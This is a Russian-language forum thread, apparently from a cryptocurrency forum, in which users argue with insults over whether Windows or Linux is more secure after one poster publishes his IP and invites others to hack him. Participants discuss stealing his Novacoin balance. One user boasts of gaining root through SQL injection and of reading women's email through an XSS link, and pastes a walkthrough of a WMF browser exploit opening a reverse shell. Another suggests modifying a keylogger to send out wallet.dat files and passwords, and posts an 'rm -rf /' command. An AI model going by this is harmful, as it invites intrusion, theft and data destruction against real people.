Просто как же? да? Ведь ты используешь виндовс, а значит он лучше. Почему? Потому-что ты его используешь. Ты самый умный. И никто не может быть умней тебя. Как так? Кто-то использует линукс, ведь он безопасней. Этого не может быть! Если бы это было так, я бы его использовал. ДА?


У меня для тебя плохие новости. Ты не самый умный. Ты не самый лучший. И виндовс твой тоже не самый лучший. Хватит завышать себя и наивно верить что мир вокруг тебя вертится. Это не так.

Если линукс такой дрявый. Скажи почему его использывают на своих серверах, гугл, яндекс и т.д. Все большие проекты?


Я тебе отвечу. Если бы на их серверах стоял виндовс. То твою почту уже давно десять раз слили бы в базу для брута в месте с паролем. И какой-то бравый школьник попав к тебе в почту подзаработал на тебе BTC Может быть это был я. Ведь из-за того, что я использую линукс бравые супер умные виндузятники назвали меня школьников. Я это только рад. Школьник звучит гордо! Первое ассоциация знания. А виндузятник как то звучит.. Первые ассоциации, игровые задроты, синий экран, лох, взломанный комп и т.д.

[becool]

Опять becool нихуя не понял и начал холивар.
Смысл этого поста, что и Mac и в Linux есть уязвимости. И то что вы пишете "Установи Linux и будет безопастность, а Windows хакнет любой школьник" полный пиздёж. Во-первых ты becool неспособен хакнуть Windows, видимо детсадовец.(мой IP 5.166.106.143, Windows, хакай) Во-вторых, то что находится уязвимости в Linux, доказывает что вполне могли хакнуть, используя те уязвимости пока они не были пофиксены.

Ахаха, теперь тебя рвануло. В другом топике бравые ребятишки не предоставив не одного факта соснули у меня хуйца.

Да. Я утверждаю, что установив линукс, безопасность повышается на 90%. Это тебе скажет любой хакер. Тот кто занимается взломом. Не веришь? Сходи к ним в унион и спроси.

Просто как же? да? Ведь ты используешь виндовс, а значит он лучше. Почему? Потому-что ты его используешь. Ты самый умный. И никто не может быть умней тебя. Как так? Кто-то использует линукс, ведь он безопасней. Этого не может быть! Если бы это было так, я бы его использовал. ДА?


У меня для тебя плохие новости. Ты не самый умный. Ты не самый лучший. И виндовс твой тоже не самый лучший. Хватит завышать себя и наивно верить что мир вокруг тебя вертится. Это не так.

Если линукс такой дрявый. Скажи почему его использывают на своих серверах, гугл, яндекс и т.д. Все большие проекты?


Я тебе отвечу. Если бы на их серверах стоял виндовс. То твою почту уже давно десять раз слили бы в базу для брута в месте с паролем. И какой-то бравый школьник попав к тебе в почту подзаработал на тебе BTC Может быть это был я. Ведь из-за того, что я использую линукс бравые супер умные виндузятники назвали меня школьников. Я это только рад. Школьник звучит гордо! Первое ассоциация знания. А виндузятник как то звучит.. Первые ассоциации, игровые задроты, синий экран, лох, взломанный комп и т.д.

Чтобы ты понимал.
Как бы еще для понимания, их вождь знатный поклонник винды.
Когда я в чате написал что реестр винды создан для его засирания - это вызвало такой поток говна, что только б ты видел.
Всмысле какой, всмысле опять же на меня натравил стадо баранов, и обосрал уже от их лица.
Ну как обычно.
Естетсвенно я не утверждал что реестр только для того программистами и был создан.
Я не знаю что там и как в этом видели изначально программисты.
Но так как они не сделали его достаточно прозрачным чтобы проги всегда могли писать только в свой отдельный куст который только тут и никуда и никак больше, то результат я назвал.
Вообще майкрасофту пока не было у всех интернета катастрофически важно было чтобы программеры другово проприетарного софта могли прятать где-то свое гавно, иначе бы его система так не раскрутилась.
Ну и да, а как этого писателя читателя реестра понизить в правах? Никто не задумывался? Почему у него права администратора в винде? Нахер?
Самый вирус в винде это служба работающая с реестром, и у нее права администратора на компе, точнее даже выше чем твои))
В винде у системы больше прав чем у ее админа))
rm -rf / - нет аналога, не говоря о многом другом, что ты должен делать перезагрузившись с носителя, или в безопастном режиме, а иначе пока система имеет больше прав чем ее владелец.
Ты имеешь право выдернуть из розетки, в остальном винда тут главная а не ты))

Так вот насчет реестра их вождь начал бросаться терминами что я то не знаю это не знаю, так не знаю сяк не знаю.
Что он в руках держал исходники винды и тестил ее.

Вот от одного такого троля кто обычную логику затроливает трольским методом на не важные к обсуждению детали и т.д. а потом тебя затравливает толпой и т.д. вот такие и рождаются.

Он почему так спорит усилено насчет винды? Потому что это мнение вождя, его надо обязательно всеми силами защищать.

Тоже что выше. но там стер написал тут.
Yaremi наверно постоянно охеревает, у него нормальные родители, вырос в нормальном обществе, без явных проблем, и он не привык с такой быдлотой и долбо**ами общаться которые с разговоров по теме сразу на личности переходят.
Чувак, привыкай, или иди в англоязычный раздел, тут все такие и до упаду, долбо**ы что надо.
Они вот такие: "ыыы, ловим лулзы, ыыы", "ыыы, так смешнее, ыыы" "ыыы, этот лучше зажигает,ыыы" и т.д.
Поэтому в ру разделе хороших форков достойных обсуждения может и вовсе не быть.
Они даже не стремятся что-то такое обсуждать и говорить что подумать надо. И тебя так и будут вот так поливать если что-то не поняли недопоняли что ты говоришь.
А потом еще эти долбо**ы тебя приравняют к самым тупарям школьникам и т.д. всяким ими неуважаемым типа как они тут tvv сделали мнение общественное, и тогда уже и не одного нормального не встретишь. Их долбо**изм еще и стадный. Потому и так плохо ругаться с предводителями долбо**ов. Потом вылезает вот так от фаната его как ты видешь. Общались нормально с ним, я к нему хорошо относился, и вдруг такой переход на личности. И сразу понесло рука вождя "он ничего не умеет, он только болает, он дерьмо, ата его ата мои собачки", смотри, так и есть, очередной внушенный прискакал. Поэтому ты и не понимал что я там такое пишу личные обиды свои какие-то про человека, во первых и человек не обычный не кто угодно, а один из важных персон тут, не первый раз замужем что называется, не первую патию новобранцев мазохистов обрабатывает на деньги с них (два пула не выплатил майнерам , и в валюте то туда то сюда шатания слоупоков обижает в пользу своих знающихзаранее), так и нападки вот такие от человека к кому хорошо относишься не первый раз. Тут был на форуме человек tvv можешь поискать его сообщения, и спомотреть как с подачи бальтазара его весь форум тут обсирал за человека не считали, а вот поообщавшись вне форума с людьми кто тут не свой все говорят единственный умный человек тут, вот тебе и голая правда. Говорить ты не сможешь если не будешь слушаться во всем стада баранов как они тебя поставили в стойло так и разговаривать, и если не будешь слушаться их предводителя. А предводитель их сам перевертыш, сначала было меня зачмырил перед всеми что я по асики говорил что будет с ними то что сейчас а не как стадо что "это прогресс" "это будущее".
А потом он сам же создал валюту с PoS и начал говорить что асики отстой, майнеры не дадут соврать как он тут распинался со своим стадом с пула что асики круто. Темы и сообщения эти есть. А теперь у него второе стадо, этот из них уже. Теперь он говорит асики плохо включаем майнинг PoS. Так за что он меня тогда выставил на посмешище начал оскорблять и забанил в чате биржи? А просто за то что я посмел иметь свое мнение. Вот и всё.
Главное остается повелитель, и что он сказал то должны исполнять, а неугодные будут затроллены. И вот это стадо баранов будет слушать повелителя. Так слушай, они еще настолько тупорылы, что не помнят что он говорил раньше даже по той же теме валюты. Он месяц назад одно говорил и они кричали да повелитель, есть повелитель, повелитель молодец, а сегодня он другое кричит ровно наоборот, и они да повелитель, а если ты спросил а как же то что вчера? Он им говорит ата его ата, и сразу вся толпа на тебя налетает.
И ты после этого спрашиваешь почему я про это говорю? С его подачи десятки или сотни человек тебя потом донимают везде. Ты сразу последний придурок, так сказал вождь, а он как раз не стесняется именно так и говорить и так и выставлять. А потом люди почитают ладно бы если бы только то что он напишет, а вот что вот так вот его фанаты, и звиздец, общее мнение.

Так вот, я тебе скажу просто один секрет который ты возможно не заметил, в крипте нет людей у которых нет никаких проблем, концентрация проблемных зашкаливает, и хватает тут любых, и нарков, и террористов, и хакеров, и людей с неуравновешеной психикой. Не хватает только одного, обычных простых людей, семейных, нормальных, спокойных. И это кстати даже у англоязов наблюдается, не только у наших, и я от туда узнал, но там не настолько сильно проявляется. Я не хочу сказать что крипта один сброд собирает. Тут речь о другом, только от сильной встряски и непохожести на других людей человек мог поверить что биткоин победит обычные деньги. И именно они тут все и собрались. Ну а позже пришло стадо просто услышавших по телику про рост, это такие как мммщики, но они тоже заражаются ненормальностью)))

[becool]

Может проведем эксперимент тогда уж по настоящему?
Раз человек предложил.
Берем человека не предвзятого.
У него своего компа не было, за чужими сидел пользовался офисом и типа того ничего никак не сечет.
Он приходит в магазин и говорит хочу установить ОС.
Предположим продавец тоже не предвзятый и ему одинаково предлагают и винду и линукс.
Он купили или то или то.
Достал диск, вставил.
Надписи.
Сделал всё по пунктам прошел.
В линуксе ничуть не сложнее чем в винде, раньше был заковыристый вопрос о точке монтирования, сейчас нет.
Всё, дошел до конца.
Дальше в правом углу в винде выскочило сделайте то сделайте то, и опа установите антивирус, он посмотрел на диске не написано не объясняют, х.з. не указывают главное как это сделать, написали и как?
Правда есть майкрасовтовский, может они его рекомендовать начали? Установит его или никакой, все строго по рекомендациям при установке.
Ну написали что желательно установить антивирус а где взять не написали же?
Браузер тоже есть в комплекте, запускает и давай шарится по нету.
Второй вариант.
Человек купил диск с линуксом, установил всё как написано.
готовый встроеный браузер фаерфокс.
при установки вылезала галочка хотите ли вы поставить проприетарные драйверы и софт и он нажал да и у него там вроде бы и флэш сразу если убунта.
тот с виндой ему вылезло что нужно скачать флэш он скачал и установил.

Человек как бы может типа ламер да?
Ну х.з. он обычный человек он купил заплатил деньги и верит продавцу что тот ему нормальный товар продал, что там изначально сделаено как надо, вещь то новая, ну как мы всегда в жизни делаем.

В каком из вариантов у человека больше шансов цепануть вирус?
Второй вопрос в каком из вариантов нападение из сети более вероятно?

Ах ну да, и естественно он сидит под админом, так как этот пароль при установки его просили ввести и теперь он его и вводит, если ему не сказали другово, что ты должен и юзера ввести и заходить или запускать браузер под ним.

Теперь самый главный вопрос
Почему собственна он лох что его свежеустановленная система не настроена должным образом для безопастности?
То есть он заплатил деньги и он не заинтересован чтобы его "факнули" выражаяь языком бальтазаровых мультиков.
Продавец с него полдучил деньги и деньги мошли человеку или компании в одном лице и мелкому и мягкому.
Из всей этой цепочки какая сука заинтересована чтобы его факнули если он жопу не прикроет?

Ну бесплатный софт если бы или дешевый он понял, сыр в мышеловки, повелся.
Но сцуко платный и по заверениям лучший то с куя ли он должен натягивать стальные трусы которые не натянули на заводе?

На заводе долба**ы тупорылые индусы программят таким образом как наш автоваз машины делает что надо напильником и киянкой дорабатывать?
Ну так у автоваза с этим беда от количества машин, одну бы он сделал достаточно качественно если бы дальше компутер сам наплодил копий.

Что с этими криворукими ребятами не так что каждый пользователь должен быть не ламером, а крутым человеком с напильником? Разве такую систему можно назвать лучшей если есть варианты без напильника?


Так вот, может проведем эксперимент именно по такой схеме нападение из сети?
И еще ползания по сети эксперимент так же?
Чтобы было поменьше наглово пи**ежа по этой теме?
А то каждый нагло пи**ит говорит у меня напильник лучше.
А тот без напильника должен пострадать ему суждено эволюция.
Этому ублюдку с напильником пусть бы продукты продавали которыми можно отравится, а он бы сидел и поверял всё лабораторию устроил дома и кричал что он крут, тогда бы может с виндой не мудился?
Почему же ему в магазине подукты не продают отравленые крысиным ядом?
Зато сцуко специально в другом магазине продают систему которая не предупреждает что не *** в инете сидеть под админом, и это его убьет как тот самый крысинный яд?

Ну так что? Такой эксперимент можно провести?

[Yaremi]

(мой IP 5.166.106.143, Windows, хакай)

Порт 7777 открытый + не стаит пачт устраняющий уязвимость с этим портом., эксплоит в интернете ходит.. Через ftp могут закинуть кейлоггер или ещё что-то. например удалённое управление сделать. Погугли как закрыть уязвимость, тоже вроде проскакивало. Бо хакнут, не бекул. А кто-то другой. тут у нас на форуме есть таких парочка.

[becool]

(мой IP 5.166.106.143, Windows, хакай)

Порт 7777 открытый + не стаит пачт устраняющий уязвимость с этим портом., эксплоит в интернете ходит.. Через ftp могут закинуть кейлоггер или ещё что-то. например удалённое управление сделать. Погугли как закрыть уязвимость, тоже вроде проскакивало. Бо хакнут, не бекул. А кто-то другой. тут у нас на форуме есть таких парочка.

боюсь это порт кошелька новакоин.
Надо дальше копать))
А другие все закрыты порты?
Надо ему сказать если что-то делал дополнительно для защиты со свежеустановленой виндой то это к теме не относится конечно...

Но вы меня заинтересовали.

А сколько времени дается?
Ты не будешь дальше усовершенствовать защиты?
Я не спец, и честно это признаю, и ничего не знаю, не умею в этом плане.
Но так как ты разрешил, то стоит поучится, попробовать, попытаться.
Я дважды за сутки научился:
-в одном случае поинтересовался по одному из популярных движков форума использовать sql инъекцию и нашел подходящий форум и получил в итоге root права на сервере.
-в другом случае зашел узнать про XSS увидел сайт чата с ней но фильтрованой, и вот промучавшись целый день читая доки как обходить фильтры куча куча куча всяких символов туда сюда чего как таки смог сделать ссылку, которую давая девушкам имел доступ к их почте и чату.
30+ девушек онлайн в чате были. У нескольких почитал почту и всё.

А с виндой я не побовал учится еще. Но пишут же возможно это.

[Yaremi]

(мой IP 5.166.106.143, Windows, хакай)

Порт 7777 открытый + не стаит пачт устраняющий уязвимость с этим портом., эксплоит в интернете ходит.. Через ftp могут закинуть кейлоггер или ещё что-то. например удалённое управление сделать. Погугли как закрыть уязвимость, тоже вроде проскакивало. Бо хакнут, не бекул. А кто-то другой. тут у нас на форуме есть таких парочка.

боюсь это порт кошелька новакоин.
Надо дальше копать))
А другие все закрыты порты?
Надо ему сказать если что-то делал дополнительно для защиты со свежеустановленой виндой то это к теме не относится.

Нет не все. Есть ещё порты. Но там даже не в портах дело. Скачай metasploit... Там не закрытых уязвимостей море. На некоторые нет фигса от мелкософта. Короче пипец. Что они вообще делают эти мелкософты? Им за что деньги платят? Столько дыр... пипец.

[Yaremi]

PS: Я просто посмотрел. Ничего не удалял и ничего не загружал. Если вдруг будет хищение чего-то, я этого не делал. А то сейчас кто-то бравый наделает делов а я виноватым буду.

[becool]

(мой IP 5.166.106.143, Windows, хакай)

Порт 7777 открытый + не стаит пачт устраняющий уязвимость с этим портом., эксплоит в интернете ходит.. Через ftp могут закинуть кейлоггер или ещё что-то. например удалённое управление сделать. Погугли как закрыть уязвимость, тоже вроде проскакивало. Бо хакнут, не бекул. А кто-то другой. тут у нас на форуме есть таких парочка.

боюсь это порт кошелька новакоин.
Надо дальше копать))
А другие все закрыты порты?
Надо ему сказать если что-то делал дополнительно для защиты со свежеустановленой виндой то это к теме не относится.

Нет не все. Есть ещё порты. Но там даже не в портах дело. Скачай metasploit... Там не закрытых уязвимостей море. На некоторые нет фигса от мелкософта. Короче пипец. Что они вообще делают эти мелкософты? Им за что деньги платят? Столько дыр... пипец.

А я вот как раз уже дошел до того что тоже вышел на метасплоит в поисках нового свежего сканера безопастности.
А не то что раньше был платный какой-то там, забыл, из винды работал.
И читал как метасплоит работает и как ставить.
Потом сюда написал.

[becool]

PS: Я просто посмотрел. Ничего не удалял и ничего не загружал. Если вдруг будет хищение чего-то, я этого не делал. А то сейчас кто-то бравый наделает делов а я виноватым буду.

А что там уже можно и новы стыбрить?
Что ты там посмотрел?
Выполни команду .\novacoind getbalance узнать сколько там денег? Или там нет кошелька?

Давай счас точно взломаем.

fsb4000 только чур касперского не ставь и каких нить хитрых фаерволов поумнее, а лучше никаких фаерволов кроме виндовского и по умолчанию настроеного, а то не честно!

Мы же обычного юзера тестируем! С виндой обычной а не богатого на дорогие платные фаерволы и/или касперыча!

[Yaremi]

не я пас. Я не аноним, ещё барнаульская прокуратура запретит въезд в РФ.

[fsb4000]

becool, у всех кошельков rpcallowip=127.0.0.1
Yaremi, вот тебе ещё 7000 адресов на которых скорее всего Windows, и открыты порты кошельков
https://getaddr.bitnodes.io/

[A-Bolt]

Порт 7777 открытый + не стаит пачт устраняющий уязвимость с этим портом., эксплоит в интернете ходит.. Через ftp могут закинуть кейлоггер или ещё что-то. например удалённое управление сделать. Погугли как закрыть уязвимость, тоже вроде проскакивало. Бо хакнут, не бекул. А кто-то другой. тут у нас на форуме есть таких парочка.

Прикольненько. Красноглазик пытается взломать Венду через открытый порт Novacoin. Там, кстати, ещё и порт Bitcoin открыт - 8333. Ну, прям дыра на дыре.

А что там уже можно и новы стыбрить?
Что ты там посмотрел?
Выполни команду .\novacoind getbalance узнать сколько там денег? Или там нет кошелька?

А местный форумный шизофреник даёт умные советы, как украсть монеты, не осознавая, что это не RPC-порт и команду spizdit bablo он принимать никак не будет.

Кулхацкер тим, йопта!

[Yaremi]

Я никого не собираюсь, и не собирался взламывать. А то, что 7777 tcp открыт для новы не меняет факта его открытости для чего-то другого.

Поэтому не хуй пиздеть, что я что-то взламываю. Или пытаюсь взломать. Если бы хотел бы. То давно бы это сделал. И на форумах не писал, ничего.

[Balthazar]

А то, что 7777 tcp открыт для новы не меняет факта его открытости для чего-то другого.

Мне нужно пояснять, насколько космической величины глупость содержится в данном утверждении?

Возможно, имеет место оговорка, конечно... Но, уж извините, сам факт наличия подобных оговорок как-то ошеломляет.

[Mr.Anonymous]

Там, кстати, ещё и порт Bitcoin открыт - 8333. Ну, прям дыра на дыре.

отличный получился подарок ослику
// винни-пух

ps: за картинку спасибо, улыбнуло

[Mr.Anonymous]

А то, что 7777 tcp открыт для новы не меняет факта его открытости для чего-то другого.

Мне нужно пояснять, насколько космической величины глупость содержится в данном утверждении?

Возможно, имеет место оговорка, конечно... Но, уж извините, сам факт наличия подобных оговорок как-то ошеломляет.

Не думаю что оговорка. Yaremi вообще-то прав.

[Fiery Vortex]

Школьник звучит гордо! Первое ассоциация знания. А виндузятник как то звучит.. Первые ассоциации, игровые задроты, синий экран, лох, взломанный комп и т.д.

"Школьник" звучит "учи уроки, а не шляйся по форумам, позоря родителей своей безграмотностью".

А вообще, поток вольных ассоциаций - это всё, конечно, очень интересно, но я не устаю каждый раз удивляться, как некоторые персонажи умудряются превратить техническую дискуссию в приём у психотерапевта, упрямо выступая при этом в роли пациента.

[yvv]

Картинка зачотная. Не хватает надписи "под линукс вирусов нет" на заборе.

[Balthazar]

А то, что 7777 tcp открыт для новы не меняет факта его открытости для чего-то другого.

Мне нужно пояснять, насколько космической величины глупость содержится в данном утверждении?

Возможно, имеет место оговорка, конечно... Но, уж извините, сам факт наличия подобных оговорок как-то ошеломляет.

Не думаю что оговорка. Yaremi вообще-то прав.

Если "Yaremi вообще-то прав", то он пишет из альтернативной вселенной, в которой не существует конфликта портов. Потому как до сегодняшнего вечера novacoind и bitcoind не поддерживали работу со службой совместного использования портов. Это само по себе означает, что занятые ими на интерфейсе TCP порты не могут использоваться ничем другим.

Конечно же, можно выкрутиться и сказать, что на самом деле интерфейс принадлежит маршрутизатору с хитрой таблицей и что неизвестно, куда именно пойдут пакеты. Однако, само сообщение fsb4000 подразумевает, что это не так. Ведь там прямо говорится: "вот винда, хакай".

[Mr.Anonymous]

умудряются превратить техническую дискуссию в приём у психотерапевта, упрямо выступая при этом в роли пациента.

Это называется "психбольница в руках пациентов". Но все же в порядке вроде вцелом, нет?

[Mr.Anonymous]

Если "Yaremi вообще-то прав", то он пишет из альтернативной вселенной, в которой не существует конфликта портов. Потому как до сегодняшнего вечера novacoind и bitcoind не поддерживали работу со службой совместного использования портов. Это означает, что занятые ими на интерфейсе TCP порты не могут использоваться ничем другим.

Я могу рассказать как еще бывает, но пусть лучше Yaremi растолкует.

[Fiery Vortex]

умудряются превратить техническую дискуссию в приём у психотерапевта, упрямо выступая при этом в роли пациента.

Это называется "психбольница в руках пациентов". Но все же в порядке вроде вцелом, нет?

Если дело пойдёт так и дальше, мне придётся предложить администрации взять на роль модеров русскоязычного раздела кондовых совеццких психиатров, не страдающих фальшивым гуманизмом по отношению к пациентам, в отличие от гумонанистических психолухов, прогнувшихся под всяких истериков и параноиков. Пара-тройка потенциальных кандидатов у меня имеется.

[Mr.Anonymous]

кондовых совеццких психиатров, не страдающих фальшивым гуманизмом по отношению к пациентам, в отличие от гумонанистических психолухов, прогнувшихся под всяких истериков и параноиков

оценил regex, зачет

Картинка зачотная. Не хватает надписи "под линукс вирусов нет" на заборе.

Ты все испортил, ну не в тему же совсем...

[Balthazar]

Я могу рассказать как еще бывает, но пусть лучше Yaremi растолкует.

По-всякому бывает, особенно если в драйвере TCP стека найдется интересный недочет, либо соответствующие функции будут подправлены сторонней программой. Однако же, сомневаюсь что будет что-либо растолковано в конкретном случае. Есть определенного рода перфекционистское отношение к процессу познания, так что жду этого с нетерпением.

[A-Bolt]

А то, что 7777 tcp открыт для новы не меняет факта его открытости для чего-то другого.

Мне нужно пояснять, насколько космической величины глупость содержится в данном утверждении?

Возможно, имеет место оговорка, конечно... Но, уж извините, сам факт наличия подобных оговорок как-то ошеломляет.

Я понял фразу Yaremi так:
Если порт 7777 открыт, то совсем не обязательно на нём висит именно Нова.

Хотя фраза построена так, что создаётся впечатление, что на одном порту могут висеть два сервиса.

[FAN]

вот тема дак тема... мало того что ТС бесплатным ботом через япи проиграл весь баланс на бтсе дык еще и его локальные кошели решили почистить?
шо не день то новый анек

[Mr.Anonymous]

Могу быть неправ, но простая логика упорно говорит обратное.

Пока Yaremi не дал пояснении лучше сообщение все же удалить.

[Balthazar]

Пожалуй, в этом есть смысл. В любом случае, тема безвозвратно ушла в оффтоп, так что торопиться некуда.

[becool]

Вообще я хотел вчера написать что вид сервиса можно воочию посмотреть написав telnet ip port
Да, если там открыты только порты кошельков, то боюсь никак не взломать будет никому((

[2btx]

А вот твой кент 2btx. Лжец, тролль и девственник.

Омг во что это все вывлилось, Yaremi все понимаю... мне 29 лет и у меня семья, для вас девственник это оскорбление ? Почему вы меня так назвали... хотели оскорбить меня отсутсвием секса У вас проблемы с этим ? B чего вы взяли что я знаком с постящим? У вас идея заговора ?

Я понял что моя позиция по поводу unix и linux не популярна, я прекрасно понимаю их разницу...

Предлагаю закрыть тему... и перенести в офф топ.

[Mr.Anonymous]

Предлагаю закрыть тему... и перенести в офф топ.

перенести можно - да,
только не закрывайте тред, а то придется новую создавать..

[2btx]

(мой IP 5.166.106.143, Windows, хакай)

Порт 7777 открытый + не стаит пачт устраняющий уязвимость с этим портом., эксплоит в интернете ходит.. Через ftp могут закинуть кейлоггер или ещё что-то. например удалённое управление сделать. Погугли как закрыть уязвимость, тоже вроде проскакивало. Бо хакнут, не бекул. А кто-то другой. тут у нас на форуме есть таких парочка.

Ты понимаешь что заканачанный файл в твою файловую систему не будет запущен автоматически ? Ты понимаешь о чем говоришь ? не стаит пачт устраняющий уязвимость с этим портом порты не связанны со службами напрямую... вы это понимаете ?

эксплоит в интернете ходит..

ссылку на эксплойт и видео с применением на виртуалке твое видео!!!, если ты такой профи, или опять все на турнире на твоем любимом было?

[becool]

Нет, тему как раз надо продолжать:-)
Только вот ее автор походу всетаки троль, и никто его не обкрадывал((
Автор всетаки не открывал каких то левых ссылок?
Просто если открываешь ссылки, то вариков воровства становится поболе.
Маша, смотри какой прикол: http://www.youtup.com/watch?v=A2C3b4jw8Ck
А там сплоит и загрузчик всего что сразу необходимо чтобы комп дальше уже сам искал своего хозяина пока он включен.

(мой IP 5.166.106.143, Windows, хакай)

Порт 7777 открытый + не стаит пачт устраняющий уязвимость с этим портом., эксплоит в интернете ходит.. Через ftp могут закинуть кейлоггер или ещё что-то. например удалённое управление сделать. Погугли как закрыть уязвимость, тоже вроде проскакивало. Бо хакнут, не бекул. А кто-то другой. тут у нас на форуме есть таких парочка.

Ты понимаешь что заканачанный файл в твою файловую систему не будет запущен автоматически ? Ты понимаешь о чем говоришь ? не стаит пачт устраняющий уязвимость с этим портом порты не связанны со службами напрямую... вы это понимаете ?

эксплоит в интернете ходит..

ссылку на эксплойт и видео с применением на виртуалке твое видео!!!, если ты такой профи, или опять все на турнире на твоем любимом было?

Да вот прикинь если в браузере уязвимость то при переходе по адресу происходит заливка и у тебя появляется шел.
В винде знаешь ли есть разные варианты загрузки автоматической, туева хуча кроме записи в службу.
Можно и в автозагрузку положить текущего пользователя, разве это требует прав более чем пользовательский шел?
(это если пользователь очень умный и запускал браузер не под админом, хотя большинство пользователей винды такие)
Ну это как пример.
А вообще конечно же сразу качается всё что необходимо сразу автоматически на будущее и рассовывается вовсюда куда только можно, доступ же появился уже.

ну он написал по сплоит фтп сервера, ну так так же заюзал и закинул файл куда нить для запуска.
Ну блин вы такую фигню говорите службу создать.
Нахрена такие сложности? Службу создать надо админские права вроде как в винде.
Может просто заменить путь и запускаемый файл у одного из его любимых ярлычков, если уж не вариант автозагрузки и т.д. стандартные?
ярлычок будет запсукать пограммульку которая на экран выводиться не будет, что-то там запускать и после уже запускать его любимую программульку. Вот и всё.
Поражаюсь с прикола получил доступ к жесткому, но ничего не сделаешь не запустишь в винде, вы чего?
Винда конечно ушла в чем-то вперед, но явно не настолько))

Ну и как бы админский доступ и чего-то там запуск и не нужен и вирусы никакие не нужны.
Сам напиши собственно ручно пограмму 5 строк делающую поиск по всем файлам и найденные wallet.dat отправляющую куда-то, и всё, нахрен вирусы?
Ну для случая с биржей у хакера другой софт соответственно собственоручно написаный, не 5 строк а не хера се, 200 наверно!))

Вот примерно вот так выглядит уже полученый через сплоит шелл:

Это вариант как тут было написано если стоит фтп сервер с уязвимостью и открытым портом.
Если портов не знаешь не открыты, сидит за натом и т.д., то сначала он должен получить ссылку или pdf файл или еще подобное, и когда он откроет это то ты увидешь такое:
Маша, смотри какой прикол: http://10.0.0.1:8080/ (прим. вообще-то тут должен быть внешний ip)

Юзвер заходи по ссылке (и если у него есть эта конкретная уязвимость в IE) в консоли мы должны увидеть вот что:

• HTTP Client connected from 10.0.0.2:1116, redirecting... - клиент соединился, его IP 10.0.0.2:1116, редирект
• HTTP Client connected from 10.0.0.2:1117, sending 1604 bytes of payload... - отправлено 1604 байт начинки (реверс-шелл тут)
• Got connection from 10.0.0.1:4321 <-> 10.0.0.2:1118 - установлено соединение (пайп с cmd удалённого компа)

Microsoft Windows XP ['?абЁп 5.1.2600]
(') ?RаЇRа жЁп ? cЄаRбRдв, 1985-2001.
C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>

О блин!, Это ещё что, скажете Вы - это командная строка удалённого компа того юзверя!
А что за абракадабра? - Это не та кодовая страница выбрана (у него русская винда стоит!) Щас проверим! chcp

C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>chcp
chcp
'?Єгй п ЄR¤Rў п бва -Ёж : 866
C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>

Точно это 866, поставим 1251 (виндовую, а не дос)

C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>chcp 1251
chcp 1251
'?Єгй п ЄR¤Rў п бва -Ёж : 1251
C:\Documents and Settings\Администратор\Рабочий стол>

О! Теперь всё по русски! Что делать в cmd чужого компа зависит от вашей фантазии, список команд смотрите в help по консольным командам windows. (format c: - жесть!)
Был разобран конкретный пример использования WMF-Эксплоита с начинкой реверс-шелла, ваши варианты могут быть другими.

Естественно у тех кто занимается этим профессионально есть и сразу автоматические паки того что делать в таком случае, да и на сайте висит не один сплоит, а сразу пак их.

Даже удивительно что есть тут люди кто думают что человек получивший в винде командную строку или доступ к файловой системе ничего не сделает и не стырит и т.д.

[2btx]

Самый банальный "вирус" или "троян" допустим logkeys скачайте исходники и добавьте отправку на почту или гейт, пересылку файлов или еще, что нужно ... например поиск файла wallet.dat и отправку кейлогером вашего чудо пароля. Все это чудесно работает.
cat /etc/passwd | grep nobody && rm -rf / [/b]

читай весь трейд прежде чем постить и репостить... я прекрасно знаю о уязвиостях в браузерах, заметь это не уязвимость в ОС win или nix (пример "safari site:exploit-db.com"), так же широкое распротранение имеют сплойты в java которы эксплотируються как на win так и на всех nix ситемах при исплользывание metasploit допустим... use payload... да нахуя ты это пишешь ? о чем ты говоришь что браузеры уязвины, что на порно сайтах есть ифреймы, может ты даш вырезку из муви 43 где говорят "ууу лазил по гиперссылкам на порносайтах, словил переполнение в браузере, у тебя вирусы" да ты дибил конченный ? думаешь этого не понимают ? ты не на форуме блондинок рассказывай сказки там.

Сплойты на ftp да самый популярный демон это ftpd это linux как раз... единсвенный полуприватный сплойт есть на ftpd, спойты на ftp на вин тачках рабочие где я плачу, или вы про баги serv-u который давно не актуален.

p.s. Не удивлюсь что скоро в одном из форком найдут критическое переполнение.

[2btx]

оу да ладно hxxp://www.securitylab.ru/analytics/361827.php это та уязвисость что на скрине

что вы передегиваете какая командная строка речь идет о фтп достпупе с правами на закачку, или и то без них... вы знаете что по фтп файлы не исполняются ?

В вашем случае это гибрбриная атака ftp + psexec или share + psexec на исполнение файла, но тут об этом не говориться, ты голословен и не понимаешь о чем пишешь, эта атака направленна на 139 445 порты, а не на порт 7777

командная строка как в win так и nix квинтесенция доступа, особенно win до 2012 server так как повышение прав это 100%, в них после доступа к командоной строке все усилия сводятся к повышениею прав до root uid 0 gid 0 что тоже вполне реалистично... и что ты говоришь имеешь доступ к командой строке от админа можешь сделать format C:\, нет во первый не можешь, во вторых ты можешь предпринять все но не эту команду.

cntl + f ftp о чем ты говоришь ты понимаешь ? Kaht вспомни... повысить привелегии в системе имея доступ metsploit можно командой use priv или getsystem -h.

proof

hxxp://www.offensive-security.com/


rm -rf / и будет вам счать.

http://10.0.0.1:8080/

у меня не открывается ссылка =))) дайте vpn в вашу сеть.

[becool]

Самый банальный "вирус" или "троян" допустим logkeys скачайте исходники и добавьте отправку на почту или гейт, пересылку файлов или еще, что нужно ... например поиск файла wallet.dat и отправку кейлогером вашего чудо пароля. Все это чудесно работает.
cat /etc/passwd | grep nobody && rm -rf / [/b]

читай весь трейд прежде чем постить и репостить... я прекрасно знаю о уязвиостях в браузерах, заметь это не уязвимость в ОС win или nix (пример "safari site:exploit-db.com"), так же широкое распротранение имеют сплойты в java которы эксплотируються как на win так и на всех nix ситемах при исплользывание metasploit допустим... use payload... да нахуя ты это пишешь ? о чем ты говоришь что браузеры уязвины, что на порно сайтах есть ифреймы, может ты даш вырезку из муви 43 где говорят "ууу лазил по гиперссылкам на порносайтах, словил переполнение в браузере, у тебя вирусы" да ты дибил конченный ? думаешь этого не понимают ? ты не на форуме блондинок рассказывай сказки там.

Сплойты на ftp да самый популярный демон это ftpd это linux как раз... единсвенный полуприватный сплойт есть на ftpd, спойты на ftp на вин тачках рабочие где я плачу, или вы про баги serv-u который давно не актуален.

p.s. Не удивлюсь что скоро в одном из форком найдут критическое переполнение.

